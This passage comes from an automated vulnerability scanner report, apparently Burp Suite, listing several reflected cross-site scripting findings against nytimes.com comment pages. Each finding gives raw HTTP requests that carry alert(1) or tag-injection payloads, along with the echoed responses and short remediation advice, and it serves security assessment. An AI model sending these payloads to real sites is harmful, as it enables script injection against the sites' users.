HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 72823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments9eb87'-alert(1)-'a3eb2ede684';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d46b"><a>ee5c926c967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33486

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,In
...[SNIP]...

3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aadc"-alert(1)-"9102bf926e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71893

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
ount = "nytimesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142717";
var s_pagename = "2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc14d"><a>43c86213e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 79273

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro
...[SNIP]...

3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7731'-alert(1)-'1133d4592f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commentsb7731'-alert(1)-'1133d4592f0/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 79339

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'commentsb7731'-alert(1)-'1133d4592f0';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 805f0"><a>e8419ae2ec2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B
...[SNIP]...

3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bd7f"-alert(1)-"eca8685c5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 77290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
obal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142683";
var s_pagename = "2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1180"><a>b75e6cb0360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71433

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetp
...[SNIP]...

3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efe6c'-alert(1)-'1c749a99567 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commentsefe6c'-alert(1)-'1c749a99567/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71521

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'commentsefe6c'-alert(1)-'1c749a99567';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d48e"><a>b2e8a2c3648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7
...[SNIP]...

3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d01a6"-alert(1)-"452e5e6ff60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
al,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142527";
var s_pagename = "2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197c4'-alert(1)-'5a4facb62fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments197c4'-alert(1)-'5a4facb62fc/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82577

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments197c4'-alert(1)-'5a4facb62fc';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70326"><a>8e7c289c36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82559

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo
...[SNIP]...

3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32dbf"><a>d7df2b346ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34488

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink
...[SNIP]...

3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c7c"-alert(1)-"629b7b315c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 80298

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
t";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142517";
var s_pagename = "2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f3f'-alert(1)-'ada34236929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments95f3f'-alert(1)-'ada34236929/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
